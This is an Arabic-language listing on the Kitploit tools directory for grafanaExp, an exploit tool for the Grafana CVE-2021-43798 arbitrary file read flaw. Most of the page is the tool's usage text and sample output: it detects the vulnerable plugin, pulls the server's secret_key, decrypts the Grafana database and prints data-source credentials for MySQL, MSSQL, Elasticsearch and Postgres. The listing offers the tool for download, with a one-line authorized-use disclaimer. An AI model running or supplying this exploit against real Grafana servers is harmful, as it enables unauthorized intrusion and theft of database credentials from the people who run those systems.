Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
grafanaExp — أداة استغلال لثغرة قراءة الملفات التعسفية غير المصرح بها في Grafana (CVE-2021-43798)، يمكنها اختراق الإضافات / استخراج secret_key / فك تشفير معلومات data_source تلقائيًا. | Kitploit
أدوات/GitHubGitHub/a-d-team/grafanaexp
أدوات التشفير/فك التشفيرتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHuba-d-team/grafanaexp

grafanaExp

أداة استغلال لثغرة قراءة الملفات التعسفية غير المصرح بها في Grafana (CVE-2021-43798)، يمكنها اختراق الإضافات / استخراج secret_key / فك تشفير معلومات data_source تلقائيًا.

عرض المستودع
270323منذ 10 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

grafanaExp

استغلال الثغرة CVE-2021-43798 في Grafana لقراءة الملفات التعسفية، والكشف تلقائياً عن وجود الثغرة، والمكونات الإضافية الموجودة، واستخراج المفتاح، وفك تشفير ملف قاعدة بيانات الخادم، وإخراج معلومات data_source.

طريقة الاستخدام

توفير وظائف الاستغلال وفك التشفير.

root@kitploit:~
➜  ./grafanaExp -h
NAME:
   grafanaExp - Exploit Grafana with CVE-2021-43798 Arbitrary File Read.

USAGE:
   grafanaExp [global options] command [command options] [arguments...]

AUTHOR:
   A&D-Team

COMMANDS:
   exp      -u [url] -p [plugin] -c [config] -d [db] -k [key]
   decode   decode -f [dbfile] -k [key]
   help, h  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --help, -h  show help (default: false)

Exp

الكشف تلقائياً عن وجود الثغرة، والمكونات الإضافية الموجودة، واستخراج المفتاح، وفك تشفير ملف قاعدة بيانات الخادم، وإخراج معلومات data_source:

root@kitploit:~
➜  ./grafanaExp exp -u http://localhost:3000/ 
2021/12/07 22:19:10 Target vulnerable has plugin [alertlist]
2021/12/07 22:19:10 Get secret_key [SW2YcwTIb9zpOOhoPsMm]
2021/12/07 22:19:10 type:[mysql]        name:[MySQL_01]         url:[test.mysql.io:3306]        user:[root]     password[rootpassword]  database:[test_dbname]  basic_auth_user:[]      basic_auth_password:[]
2021/12/07 22:19:10 type:[mssql]        name:[Mssql_01]         url:[test_sqlserver:1433]       user:[admin]    password[adminpassword] database:[db_sqlserver] basic_auth_user:[]      basic_auth_password:[]
2021/12/07 22:19:10 type:[elasticsearch]        name:[es_01]            url:[http://localhost:9200]     user:[] password[]      database:[]     basic_auth_user:[basic_user]    basic_auth_password:[basic_pass]
2021/12/07 22:19:10 type:[postgres]     name:[Postgre_01]               url:[Postgre_01:5432]   user:[pppp]     password[sssswwwww]     database:[postgredb]    basic_auth_user:[]      basic_auth_password:[]
2021/12/07 22:19:10 All Done, have nice day!

Decode

عندما يكون ملف قاعدة البيانات كبيراً جداً، يمكن تنزيله محلياً أولاً، ثم فك تشفيره محلياً:

root@kitploit:~
➜ ./grafanaExp decode -f grafana.db -k SW2YcwTIb9zpOOhoPsMm
2021/12/07 23:00:20 type:[mysql]        name:[MySQL_01]         url:[test.mysql.io:3306]        user:[root]     password[rootpassword]  database:[test_dbname]  basic_auth_user:[]      basic_auth_password:[]
2021/12/07 23:00:20 type:[mssql]        name:[Mssql_01]         url:[test_sqlserver:1433]       user:[admin]    password[adminpassword] database:[db_sqlserver] basic_auth_user:[]      basic_auth_password:[]
2021/12/07 23:00:20 type:[elasticsearch]        name:[es_01]            url:[http://localhost:9200]     user:[] password[]      database:[]     basic_auth_user:[basic_user]    basic_auth_password:[basic_pass]
2021/12/07 23:00:20 type:[postgres]     name:[Postgre_01]               url:[Postgre_01:5432]   user:[pppp]     password[sssswwwww]     database:[postgredb]    basic_auth_user:[]      basic_auth_password:[]

تحديثات

root@kitploit:~
1. دعم HTTPS (لم أضفه أمس لأن النقل قد يواجه بعض المشاكل الغريبة)
2. إضافة ملف تنفيذي لداروين (macOS)
3. إضافة حمولة لتجاوز nginx (تعديل بسيط لـ net/http)

إخلاء مسؤولية

يجب استخدام هذا البرنامج فقط لأغراض الاختبارات الأمنية والبحثية المصرح بها.

تنزيل الأداة